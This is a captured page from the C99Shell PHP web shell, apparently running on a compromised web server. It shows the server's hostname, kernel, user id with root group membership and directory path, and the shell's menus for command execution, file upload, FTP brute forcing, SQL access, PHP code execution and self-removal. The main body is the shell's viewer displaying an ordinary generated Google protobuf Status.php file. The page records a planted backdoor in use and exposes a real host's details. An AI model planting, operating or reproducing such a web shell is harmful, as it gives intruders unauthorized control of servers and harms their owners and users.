!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/common-protos/src/Rpc/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Status.php (5.09 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/rpc/status.proto

namespace Google\Rpc;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * The `Status` type defines a logical error model that is suitable for
 * different programming environments, including REST APIs and RPC APIs. It is
 * used by [gRPC](https://github.com/grpc). Each `Status` message contains
 * three pieces of data: error code, error message, and error details.
 * You can find out more about this error model and how to work with it in the
 * [API Design Guide](https://cloud.google.com/apis/design/errors).
 *
 * Generated from protobuf message <code>google.rpc.Status</code>
 */
class Status extends \Google\Protobuf\Internal\Message
{
    
/**
     * The status code, which should be an enum value of
     * [google.rpc.Code][google.rpc.Code].
     *
     * Generated from protobuf field <code>int32 code = 1;</code>
     */
    
protected $code 0;
    
/**
     * A developer-facing error message, which should be in English. Any
     * user-facing error message should be localized and sent in the
     * [google.rpc.Status.details][google.rpc.Status.details] field, or localized
     * by the client.
     *
     * Generated from protobuf field <code>string message = 2;</code>
     */
    
protected $message '';
    
/**
     * A list of messages that carry the error details.  There is a common set of
     * message types for APIs to use.
     *
     * Generated from protobuf field <code>repeated .google.protobuf.Any details = 3;</code>
     */
    
private $details;

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type int $code
     *           The status code, which should be an enum value of
     *           [google.rpc.Code][google.rpc.Code].
     *     @type string $message
     *           A developer-facing error message, which should be in English. Any
     *           user-facing error message should be localized and sent in the
     *           [google.rpc.Status.details][google.rpc.Status.details] field, or localized
     *           by the client.
     *     @type array<\Google\Protobuf\Any>|\Google\Protobuf\Internal\RepeatedField $details
     *           A list of messages that carry the error details.  There is a common set of
     *           message types for APIs to use.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Rpc\Status::initOnce();
        
parent::__construct($data);
    }

    
/**
     * The status code, which should be an enum value of
     * [google.rpc.Code][google.rpc.Code].
     *
     * Generated from protobuf field <code>int32 code = 1;</code>
     * @return int
     */
    
public function getCode()
    {
        return 
$this->code;
    }

    
/**
     * The status code, which should be an enum value of
     * [google.rpc.Code][google.rpc.Code].
     *
     * Generated from protobuf field <code>int32 code = 1;</code>
     * @param int $var
     * @return $this
     */
    
public function setCode($var)
    {
        
GPBUtil::checkInt32($var);
        
$this->code $var;

        return 
$this;
    }

    
/**
     * A developer-facing error message, which should be in English. Any
     * user-facing error message should be localized and sent in the
     * [google.rpc.Status.details][google.rpc.Status.details] field, or localized
     * by the client.
     *
     * Generated from protobuf field <code>string message = 2;</code>
     * @return string
     */
    
public function getMessage()
    {
        return 
$this->message;
    }

    
/**
     * A developer-facing error message, which should be in English. Any
     * user-facing error message should be localized and sent in the
     * [google.rpc.Status.details][google.rpc.Status.details] field, or localized
     * by the client.
     *
     * Generated from protobuf field <code>string message = 2;</code>
     * @param string $var
     * @return $this
     */
    
public function setMessage($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->message $var;

        return 
$this;
    }

    
/**
     * A list of messages that carry the error details.  There is a common set of
     * message types for APIs to use.
     *
     * Generated from protobuf field <code>repeated .google.protobuf.Any details = 3;</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getDetails()
    {
        return 
$this->details;
    }

    
/**
     * A list of messages that carry the error details.  There is a common set of
     * message types for APIs to use.
     *
     * Generated from protobuf field <code>repeated .google.protobuf.Any details = 3;</code>
     * @param array<\Google\Protobuf\Any>|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setDetails($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::MESSAGE\Google\Protobuf\Any::class);
        
$this->details $arr;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--